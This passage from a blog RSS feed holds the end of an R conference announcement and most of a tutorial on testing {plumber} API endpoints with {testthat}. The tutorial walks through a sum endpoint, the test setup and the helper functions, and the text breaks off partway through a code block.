&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;There are three workshops running in parallel on the day, each given by one of our JR trainers!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Introduction to RStudio Connect&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect is a hosting platform which makes publishing your shiny applications; plumber APIs; R Markdown documents, and many other content types, painless and easy. In this workshop we will demonstrate a few different workflows which allow you to host, share, and scale content on RStudio Connect.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Introduction to Tableau&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Faster and more capable of handling larger datasets than Excel, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high-level of customisation. This workshop is designed for people with no prior experience of Tableau, who want to get to grips with the basics of summarising and interactively visualising their data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Reporting with Quarto&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quarto is a brand new open source publishing system that allows you to dynamically create static or interactive documents and automatically update reports when data changes. Whether you are hoping to generate HTML, PDF or Microsoft Word like documents, or even slides for a presentation, Quarto tailors to your needs. This workshop will demonstrate how to make a range of outputs, from simple documents, to presentations and dashboards.&lt;/p&gt;
&lt;h2 id="speakers"&gt;Speakers&lt;/h2&gt;
&lt;p&gt;We have a great line up of speakers coming up - you can read more about their talks in their abstracts which are now live on &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;the website&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Collage of speakers faces" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/speaker_collage_updated.png" width="1500"&gt;&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;p&gt;A huge thank you to the sponsors of this event, NU Solve, the Royal Statistical Society, who are sponsoring the Drinks Reception, and the National Innovation Centre for Data for providing the room hire!&lt;/p&gt;
&lt;img src="NICD_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;
&lt;img src="nu-solve-colour.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NU Solve logo" /&gt;
&lt;img src="royal_statistical_society.jpg" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="RSS logo" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>API as a package: Testing</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-testing/</link><pubDate>Thu, 29 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-testing/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-testing/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-testing/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;This is part the final part of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure/" rel="external"&gt;Part 1: API as a package:
Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-logging/" rel="external"&gt;Part 2: API as a package:
Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: API as a package: Testing (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This blog post is a follow on to our API as a package series, which
looks to expand on the topic of testing {plumber} API applications
within the package structure leveraging {testthat}. As a reminder of the
situation, so far we have an R package that defines functions that will
be used as endpoints in a {plumber} API application. The API routes
defined via {plumber} decorators in &lt;code&gt;inst&lt;/code&gt; simply map the package
functions to URLs.&lt;/p&gt;
&lt;h2 id="the-three-stages-of-testing"&gt;The three stages of testing&lt;/h2&gt;
&lt;p&gt;The intended structure of the API as a package setup is to encourage a
particular, consistent, composition of code for each exposed endpoint.
That is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A plumber decorator that maps a package function to a URL&lt;/li&gt;
&lt;li&gt;A wrapper function that takes a request object, deals with any
serialization of data and dispatches to a “business logic” function&lt;/li&gt;
&lt;li&gt;The “business logic” function, or core functionality of the purpose
of a particular endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that, we believe that this induces three levels of testing to
consider:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Does the running API application successfully return an appropriate
response when we make a request to an endpoint?&lt;/li&gt;
&lt;li&gt;Does the wrapper function handle behaviour matching your
expectations?&lt;/li&gt;
&lt;li&gt;Is my logic correct?&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-testing"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="example-sum"&gt;Example: Sum&lt;/h2&gt;
&lt;p&gt;Consider a POST endpoint that will sum the numeric contents of objects.
For simplicity, we will consider only requests that send valid JSON
objects, however there are a few scenarios that might arise:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;A JSON array&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# array.json
[1, 2]
# expected sum: [3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A single JSON object&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# single_object.json
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
}
# expected sum: [3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;An array of JSON objects&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# array_objects.json
[
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
},
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
}
]
# expected sum: [3, 3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="r-code-solution"&gt;R code solution&lt;/h3&gt;
&lt;p&gt;Writing some R code to ensure that we calculate the expected sums for
each of these is fairly simple, keeping in mind that when parsing JSON
objects we would obtain a named list to represent an object and an
unnamed list to represent an array:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R/api_sum.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to check whether the object we &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# receive looks like a json array&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_array &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(parsed_json) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(parsed_json))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to sum the numeric components in a list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sum_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(l) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;keep&lt;/span&gt;(l, is.numeric) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reduce&lt;/span&gt;(`+`, .init &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main sum function which handles lists of lists appropriately&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_array&lt;/span&gt;(x)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.list&lt;/span&gt;(x)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(x, sum_list)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum_list&lt;/span&gt;(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To integrate this into our API service we can then write a wrapper
function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R/api_sum.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# parse the JSON body of the request&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; parsed_json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;postBody)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# return the sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_sum&lt;/span&gt;(parsed_json))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and add a plumber annotation in &lt;code&gt;inst/extdata/api/routes/example.R&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @post /sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @serializer unboxedJSON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;api_sum
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which exposes our sum function on the URL &lt;code&gt;&amp;lt;root_of_api&amp;gt;/example/sum&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="testing-setup"&gt;Testing: Setup&lt;/h2&gt;
&lt;p&gt;With the above example we are now ready to start writing some tests.
There are a few elements which are likely to be common when wanting to
test endpoints of an API application:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start an instance of your API&lt;/li&gt;
&lt;li&gt;Send a request to your local running API&lt;/li&gt;
&lt;li&gt;Create a mock object that looks like a real rook request object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The {testthat} package for R has utilities that make defining and using
common structures like this easy. A &lt;code&gt;tests/testthat/setup.R&lt;/code&gt; script will
run before any tests are constructed, here we can put together the setup
and subsequent tear down for a running API instance, for our
cookieCutter example package being built as part of this series this
might look like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test/testthat/setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run before any tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# pick a random available port to serve your app locally&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# note that port will also be available in the environment in which your&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests run.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httpuv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomPort&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start a background R process that launches an instance of the API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# serving on that random port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;running_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; callr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r_bg&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(port) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;(routes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port, host &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run after all tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;withr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;defer&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;kill&lt;/span&gt;(), testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;teardown_env&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this, as our test suite runs, we can send requests to our API at
the following url pattern, &lt;code&gt;http://0.0.0.0:{port}{endpoint}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Similarly, {testthat} allows for defining helper functions for the
purposes of your test-suite. Any file with “helper” at the beginning of
the name in your testthat directory will be executed before your tests
run. We might use this to define some helper functions which will allow
us to send requests easily and create mock objects, as well as some
other things.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# convenience function for creating correct endpoint url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;endpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(str) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://0.0.0.0:{port}{str}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# convenience function for sending post requests to our test api&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api_post &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(url, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;POST&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;endpoint&lt;/span&gt;(url), &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to create minimal mock request objects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# doesn&amp;#39;t fully replicate a rook request, but gives the parts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we need&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;as_fake_post &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(obj) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new.env&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HTTP_CONTENT_TYPE &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;postBody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; obj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You might also want to skip the API request tests in cases where the API
service did not launch correctly&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# skip other tests if api is not alive&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;skip_dead_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# running_api is created in setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;skip_if_not&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_alive&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;API not started&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;One of the things that we like to do, inspired by the
&lt;a href="https://pypi.org/project/pytest-datadir/" rel="external"&gt;pytest-datadir&lt;/a&gt; plugin for
the python testing framework, pytest, is have numerous test cases stored
as data files. This makes it easy to run your tests against many
examples, as well as to add new ones that should be tested in future.
With that our final helper function might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_case_json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(path) {
